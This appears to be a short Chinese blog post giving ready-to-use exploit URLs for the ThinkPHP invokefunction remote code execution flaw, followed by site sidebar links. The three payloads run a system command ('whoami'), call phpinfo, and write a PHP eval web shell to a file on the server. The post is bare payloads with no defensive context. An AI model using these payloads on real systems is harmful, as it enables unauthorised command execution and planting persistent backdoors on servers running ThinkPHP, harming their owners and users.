Thinkphp(TP)

谪仙1232024-09-24 12:16

1.远程命令执行

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

2.远程代码执行

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

3.getshell

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php @eval($_POST[cmd]);?>' >1.php

相关推荐
jieyu11193 小时前
uploads-labs靶场通关(1)
web安全·文件上传漏洞·靶场通关
竹等寒6 小时前
Linux-网络安全私房菜(二)
linux·服务器·web安全
white-persist8 小时前
CSRF 漏洞全解析:从原理到实战
网络·python·安全·web安全·网络安全·系统安全·csrf
渗透测试老鸟-九青9 小时前
网络安全之揭秘APT Discord C2 以及如何取证
安全·web安全·网络安全学习路线
key069 小时前
大模型在网络安全领域的应用与评测
网络·人工智能·web安全
数字供应链安全产品选型1 天前
国家级!悬镜安全入选两项“网络安全国家标准应用实践案例”
人工智能·安全·web安全
鹿鸣天涯1 天前
商用密码应用安全性评估
网络·安全·web安全
jieyu11191 天前
xxe靶场通关
安全·web安全
A Runner for leave2 天前
网络与通信安全课程复习汇总2——信息保密
web安全
缘友一世2 天前
漏洞扫描POC和web漏洞扫描工具
网络·安全·web安全
热门推荐
01BongoCat - 跨平台键盘猫动画工具02GitHub 镜像站点03UV安装并设置国内源04Linux下V2Ray安装配置指南05KGG转MP3工具|非KGM文件|解密音频06两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答07荣耀手机2025年10月发布的新品Magic8比起Magic7,在硬件、性能、价格等上有什么区别,有什么优势08Java IO 流 + MinIO:游戏玩家自定义头像上传(格式校验、压缩处理、存储管理)09GitLab 零基础入门指南:从安装到项目管理全流程10windows找不到gpedit.msc(本地组策略编辑器)